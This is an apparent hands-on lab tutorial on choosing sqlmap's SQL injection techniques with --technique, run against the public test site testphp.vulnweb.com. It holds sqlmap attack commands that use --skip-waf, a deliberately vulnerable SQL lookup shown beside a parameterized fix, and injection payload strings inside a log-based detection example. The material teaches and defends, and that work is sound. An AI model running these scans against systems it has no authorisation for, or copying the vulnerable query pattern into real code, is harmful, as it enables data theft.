Introduction
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
In this lab, you will learn how to specify different SQL injection techniques in sqlmap using the --technique option. This allows you to control which methods sqlmap attempts to use for injection, which can be useful for targeting specific vulnerabilities or optimizing scan times.
Understand the Six SQLi Technique Codes (B, E, U, S, T, Q)
In this step, you will learn about the different SQL injection technique codes that sqlmap uses. sqlmap supports various SQL injection techniques, and you can specify which ones to use with the --technique option. Each technique is represented by a single character.
The six main SQL injection technique codes are:
- B: Boolean-based blind SQL injection. This technique relies on sending SQL queries that return a TRUE or FALSE result, and then observing the application's response (e.g., page content changes) to infer information.
- E: Error-based SQL injection. This technique forces the database to generate an error message containing information about the database structure or data.
- U: UNION query-based SQL injection. This technique uses the UNION SQL operator to combine the results of two or more SELECT statements into a single result set, allowing an attacker to retrieve data from other tables.
- S: Stacked queries SQL injection. This technique allows an attacker to execute multiple SQL statements in a single query, often used for executing arbitrary commands on the database server.
- T: Time-based blind SQL injection. This technique relies on making the database pause for a specified amount of time based on a TRUE or FALSE condition, allowing an attacker to infer information by observing response times.
- Q: Inline queries SQL injection. This technique involves injecting subqueries directly into the original query.
Understanding these techniques is crucial for effectively using sqlmap and for comprehending the underlying principles of SQL injection.
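To make the Boolean-based blind code (B) concrete from the application side, the following added example (not code from the lab or from sqlmap) places the defect that technique B detects beside its parameterized fix. The in-memory SQLite table and its rows are constructed sample data standing in for the target's artists lookup; `boolean_blind_differential` reproduces the core of the B check, the same id sent once with an always-TRUE and once with an always-FALSE condition, and reports whether the two responses differ.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the target's artists data (sample rows, not the page's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)", [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The defect behind technique B: the request parameter is pasted into the SQL text,
    so whatever the client appends becomes part of the WHERE clause."""
    sql = f"SELECT name FROM artists WHERE id = {raw_id}"  # deliberately vulnerable
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    """Hardened form: validate the type, then bind the value as a query parameter.
    The driver passes it as data, so no part of it can change the query's logic."""
    try:
        artist_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # anything that is not an integer id is rejected before it reaches the database
    return [row[0] for row in conn.execute("SELECT name FROM artists WHERE id = ?", (artist_id,))]


def boolean_blind_differential(lookup, conn, base_id="1"):
    """The core of a Boolean-based blind check: send the same id once with a condition that is
    always TRUE and once with one that is always FALSE, then compare the two responses.
    Returns True when they differ, i.e. the appended condition was evaluated by the database."""
    true_resp = lookup(conn, f"{base_id} AND 1=1")
    false_resp = lookup(conn, f"{base_id} AND 1=2")
    return true_resp != false_resp


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("parameterized", lookup_safe)):
        print(f"{label:13s} normal id -> {fn(db, '1')}, "
              f"TRUE/FALSE responses differ: {boolean_blind_differential(fn, db)}")
```

Running it shows both lookups returning the same row for a normal id, while only the concatenating version yields different responses for the TRUE and FALSE conditions; that difference in page content is exactly the signal technique B infers data from, and parameter binding removes it.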
Force a Boolean-based Blind Test with --technique=B
In this step, you will learn how to force sqlmap to use only the Boolean-based blind SQL injection technique. This can be useful when you suspect a target is vulnerable to this specific type of injection, or when you want to reduce the scan time by focusing on a single technique.
The --technique=B option tells sqlmap to exclusively use Boolean-based blind injection.
Let's simulate running sqlmap with this option. In a real scenario, you would replace http://testphp.vulnweb.com/artists.php?id=1 with your target URL. For this lab, we will just demonstrate the command.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=B --batch --eta --skip-waf
- -u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL. This is a known vulnerable test site.
- --technique=B: Forces sqlmap to use only Boolean-based blind injection.
- --batch: Runs sqlmap in non-interactive mode, accepting default choices.
- --eta: Displays estimated time of arrival for each output.
- --skip-waf: Skips web application firewall (WAF) detection.
You will observe sqlmap's output, which will indicate that it is primarily testing for Boolean-based blind vulnerabilities. The output will show sqlmap trying different payloads and analyzing the responses.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'Boolean-based blind - Parameter: id'
...
The output confirms that sqlmap is focusing on the Boolean-based blind technique.
Force a Time-based Blind Test with --technique=T
In this step, you will learn how to force sqlmap to use only the Time-based blind SQL injection technique. This technique is often used when other methods, like error-based or Boolean-based, do not yield results, especially when the application's response content stays the same regardless of whether the injected condition is true or false, so that the only observable difference is how long the server takes to answer.
The --technique=T option tells sqlmap to exclusively use time-based blind injection.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=T --batch --eta --skip-waf
- -u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL.
- --technique=T: Forces sqlmap to use only Time-based blind injection.
- --batch: Runs sqlmap in non-interactive mode.
- --eta: Displays estimated time of arrival.
- --skip-waf: Skips WAF detection.
You will observe sqlmap's output, which will show it injecting payloads that cause delays in the server's response. This method can be slower than others due to the need to wait for time delays.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'Time-based blind - Parameter: id'
...
The output confirms that sqlmap is now focusing on the Time-based blind technique.
Force a UNION Query-based Test with --technique=U
In this step, you will learn how to force sqlmap to use only the UNION query-based SQL injection technique. This technique is highly effective when the application displays the results of the SQL query directly on the page, as it allows an attacker to retrieve data from other tables in the database.
The --technique=U option tells sqlmap to exclusively use UNION query-based injection.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=U --batch --eta --skip-waf
- -u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL.
- --technique=U: Forces sqlmap to use only UNION query-based injection.
- --batch: Runs sqlmap in non-interactive mode.
- --eta: Displays estimated time of arrival.
- --skip-waf: Skips WAF detection.
You will observe sqlmap's output, which will show it attempting to inject UNION SELECT statements. If successful, this technique can quickly reveal database structure and data.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'UNION query - Parameter: id'
...
The output confirms that sqlmap is now focusing on the UNION query-based technique.
Execute a Scan with Multiple Techniques using --technique=BEUST
In this step, you will learn how to combine multiple SQL injection techniques in a single sqlmap scan. This is often the most practical approach, as it allows sqlmap to try various methods to find vulnerabilities, increasing the chances of success.
You can specify multiple techniques by concatenating their respective codes after --technique=. For example, --technique=BEUST will tell sqlmap to try Boolean-based, Error-based, UNION query-based, Stacked queries, and Time-based blind injections.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=BEUST --batch --eta --skip-waf
- -u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL.
- --technique=BEUST: Forces sqlmap to use Boolean-based, Error-based, UNION query-based, Stacked queries, and Time-based blind injections.
- --batch: Runs sqlmap in non-interactive mode.
- --eta: Displays estimated time of arrival.
- --skip-waf: Skips WAF detection.
You will observe sqlmap's output, which will show it systematically testing each of the specified techniques. This comprehensive approach is generally recommended for initial scans.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'Boolean-based blind - Parameter: id'
[12:00:02] [INFO] testing 'Error-based - Parameter: id'
[12:00:03] [INFO] testing 'UNION query - Parameter: id'
[12:00:04] [INFO] testing 'Stacked queries - Parameter: id'
[12:00:05] [INFO] testing 'Time-based blind - Parameter: id'
...
The output confirms that sqlmap is now testing multiple techniques as specified.
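Seen from the server side, a --technique=BEUST run leaves a recognisable pattern: one client cycling through requests whose decoded parameters carry the SQL each technique needs (a TRUE/FALSE comparison for B, an error-provoking function for E, a second SELECT joined by UNION for U, a statement separator for S, a delay primitive for T). The following added example (not part of the lab or of sqlmap) parses combined-format access-log lines, decodes the query parameters, tags each request with the technique codes it matches and aggregates per source IP, also noting whether the client identified itself with a sqlmap User-Agent. The log lines, IP addresses and the `sqlmap/3.7-dev` User-Agent string are constructed sample data, and the marker patterns are a deliberately small signature set for illustration, not a complete ruleset.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access-log lines, not real traffic: one client probing
# artists.php?id with each technique from this lab, plus one ordinary browser request.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2023:12:00:01 +0000] "GET /artists.php?id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/3.7-dev (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2023:12:00:01 +0000] "GET /artists.php?id=1%20AND%201%3D2 HTTP/1.1" 200 4870 "-" "sqlmap/3.7-dev (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2023:12:00:02 +0000] "GET /artists.php?id=1%20AND%20EXTRACTVALUE(1%2C1) HTTP/1.1" 500 611 "-" "sqlmap/3.7-dev (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2023:12:00:03 +0000] "GET /artists.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL HTTP/1.1" 200 5200 "-" "sqlmap/3.7-dev (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2023:12:00:04 +0000] "GET /artists.php?id=1%3BSELECT%201-- HTTP/1.1" 200 5120 "-" "sqlmap/3.7-dev (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2023:12:00:05 +0000] "GET /artists.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/3.7-dev (https://sqlmap.org)"
198.51.100.7 - - [01/Jan/2023:12:00:06 +0000] "GET /artists.php?id=2 HTTP/1.1" 200 5100 "http://testphp.vulnweb.com/" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Technique code -> marker pattern, matched against upper-cased, URL-decoded parameter values.
# Same codes as sqlmap's --technique option; each marker is the minimal SQL that technique needs.
TECHNIQUE_MARKERS = {
    "B": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+"),                      # TRUE/FALSE comparison
    "E": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\("),                 # error-provoking functions
    "U": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b"),                     # second SELECT merged in
    "S": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b"),   # statement separator
    "T": re.compile(r"\b(SLEEP|PG_SLEEP|BENCHMARK)\s*\(|\bWAITFOR\s+DELAY\b"),  # delay primitives
}
CODE_ORDER = "BEUSTQ"  # the order the lab lists the codes in


def classify_request(line):
    """Parse one log line; return (ip, set of technique codes, sqlmap_user_agent) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
    decoded = " ".join(v for values in params.values() for v in values).upper()
    codes = {code for code, pat in TECHNIQUE_MARKERS.items() if pat.search(decoded)}
    return m["ip"], codes, "sqlmap" in m["ua"].lower()


def summarize(log_text):
    """Aggregate per source IP: technique codes seen (in BEUSTQ order), request count and
    whether the client announced itself as sqlmap. One IP accumulating several codes in
    quick succession is the log-side shape of a --technique=BEUST scan."""
    per_ip = defaultdict(lambda: {"codes": set(), "sqlmap_ua": False, "requests": 0})
    for line in log_text.splitlines():
        parsed = classify_request(line)
        if parsed is None:
            continue  # skip lines that are not in combined log format
        ip, codes, is_sqlmap = parsed
        per_ip[ip]["codes"] |= codes
        per_ip[ip]["sqlmap_ua"] = per_ip[ip]["sqlmap_ua"] or is_sqlmap
        per_ip[ip]["requests"] += 1
    return {
        ip: {
            "codes": "".join(c for c in CODE_ORDER if c in info["codes"]),
            "sqlmap_ua": info["sqlmap_ua"],
            "requests": info["requests"],
        }
        for ip, info in per_ip.items()
    }


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(f"{ip:15s} requests={info['requests']} techniques={info['codes'] or '-'} "
              f"sqlmap_ua={info['sqlmap_ua']}")
```

For the constructed log the probing client comes out with techniques BEUST and a sqlmap User-Agent, while the browser request matches nothing. Note that the User-Agent is trivially changed by the operator (sqlmap has switches for that), so the decoded-parameter markers, not the UA string, are the part of this check worth keeping in a real detection rule.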
Summary
In this lab, you have successfully learned how to specify and control the SQL injection techniques used by sqlmap. You explored the individual technique codes (B, E, U, S, T, Q) and practiced forcing sqlmap to use specific methods like Boolean-based blind, Time-based blind, and UNION query-based injections. Finally, you learned how to combine multiple techniques for a more comprehensive scan.
Understanding and utilizing the --technique option in sqlmap allows you to fine-tune your vulnerability assessments, optimize scan times, and target specific types of SQL injection vulnerabilities more effectively. This skill is crucial for efficient and precise penetration testing.